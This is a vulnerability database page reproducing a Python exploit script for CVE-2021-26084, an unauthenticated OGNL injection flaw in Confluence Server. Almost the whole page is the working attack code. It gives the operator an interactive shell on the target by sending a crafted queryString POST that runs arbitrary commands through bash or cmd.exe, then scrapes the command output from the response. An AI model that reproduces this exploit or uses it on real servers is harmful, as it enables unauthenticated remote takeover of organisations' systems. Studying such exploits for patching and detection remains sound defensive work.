Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2021-26084

Publish Date: 01 Sep 2021

Author: h3v0x

Source

                							

                # Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All &lt; 7.12.x versions before 7.12.5
# Tested on: Linux Distros 
# CVE : CVE-2021-26084

#!/usr/bin/python3

# References: 
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()
session = requests.Session()

url_vuln = options.url
endpoint = options.path

if not options.url or not options.path:

    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()


def banner():

    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec():

    while True:
        cmd = input('&gt; ')
        xpl_url = url_vuln + endpoint
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
        xpl_data = {"queryString": "aaaaaaaa\027+{Class.forName(\027javax.script.ScriptEngineManager\027).newInstance().getEngineByName(\027JavaScript\027).\065val(\027var isWin = java.lang.System.getProperty(\022os.name\022).toLowerCase().contains(\022win\022); var cmd = new java.lang.String(\022"+cmd+"\022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\022cmd.exe\022, \022/c\022, cmd); } else{p.command(\022bash\022, \022-c\022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \022\022; var output = \022\022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\027)}+\027"}
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)

        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
        print(queryStringValue)


banner()
cmdExec()
            
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Confluence Server 7.12.4 OGNL Injection Remote Code Execution

Vulmon Search

About

Products

Connect